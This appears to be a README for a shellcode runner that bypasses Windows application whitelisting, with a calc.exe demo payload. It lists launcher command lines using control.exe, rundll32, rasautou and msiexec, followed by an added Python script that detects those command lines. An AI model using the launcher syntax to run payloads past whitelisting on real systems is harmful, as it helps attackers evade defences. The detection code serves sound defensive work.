Shellcode runner for all application whitelisting bypasses. The shellcode included in this project spawns calc.exe.
To use a different injection type, set the following constant to the appropriate ExecutionMethod value:
public const ExecutionMethod method = ExecutionMethod.CreateThread;
The DLL can be run with the following legitimate executables:
Export: CPlApplet
Syntax: Rename the compiled file's “dll” extension to “cpl” and double-click it.
Control.exe [cplfile]
Rundll32.exe Shell32.dll, Control_RunDLL [cplfile]
Export: powershell
rasautou -d {dllpayload} -p powershell -a a -e e
Export: DllUnregisterServer
msiexec /z {full path to msiexec.dll}
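Each launcher listed above leaves a recognizable process command line, which is what a defender can alert on. The following is an added detection example, not code from this project: it matches process-creation command lines against the four syntaxes above. The rule names, the sample command lines, and the choice to ignore bare or System32 CPL names are assumptions made for this example.

```python
import re

# Constructed process-creation command lines (not captured from a real host).
SAMPLES = [
    r'C:\Windows\System32\control.exe C:\Users\test\Desktop\sample.cpl',
    r'control.exe timedate.cpl',
    r'rundll32.exe Shell32.dll,Control_RunDLL C:\Users\test\sample.cpl',
    r'rasautou -d C:\Users\test\sample.dll -p powershell -a a -e e',
    r'msiexec /z C:\Users\test\sample.dll',
    r'msiexec /i C:\Temp\setup.msi /qn',
]

def image(name):
    # Image name at line start or after a path separator/quote, optional .exe.
    return r'(?:^|[\\/"])' + name + r'(?:\.exe)?"?\s+'

# A .cpl argument, quoted (may contain spaces) or unquoted.
CPL = r'(?P<cpl>"[^"]+\.cpl"|\S+\.cpl)'
RULES = [  # rule names are hypothetical labels
    ("control_cpl", re.compile(image("control") + CPL, re.I)),
    ("rundll32_control_rundll", re.compile(
        image("rundll32") + r'"?shell32(?:\.dll)?"?\s*,\s*Control_RunDLL\s+' + CPL, re.I)),
    ("rasautou_dll_export", re.compile(
        image("rasautou") + r'.*[-/]d\s+\S+.*[-/]p\s+\S+', re.I)),
    ("msiexec_z_dll", re.compile(image("msiexec") + r'(?:.*\s)?/z\s+\S+', re.I)),
]
SYSTEM_DIRS = ("\\windows\\system32\\", "\\windows\\syswow64\\")

def is_baseline_cpl(path):
    # Assumption: bare names (e.g. timedate.cpl) and CPLs under the system
    # directories are normal Control Panel activity and are not reported.
    p = path.strip('"').lower()
    return "\\" not in p or any(d in p for d in SYSTEM_DIRS)

def detect(cmdline):
    """Return the names of all rules that the command line triggers."""
    hits = []
    for name, rx in RULES:
        m = rx.search(cmdline)
        if not m:
            continue
        cpl = m.groupdict().get("cpl")
        if cpl and is_baseline_cpl(cpl):
            continue  # CPL launch that matches the benign baseline
        hits.append(name)
    return hits

if __name__ == "__main__":
    for line in SAMPLES:
        print(detect(line) or ["-"], line)
```

In production the same patterns would be applied to the command-line field of process-creation telemetry, with the baseline tuned to the environment.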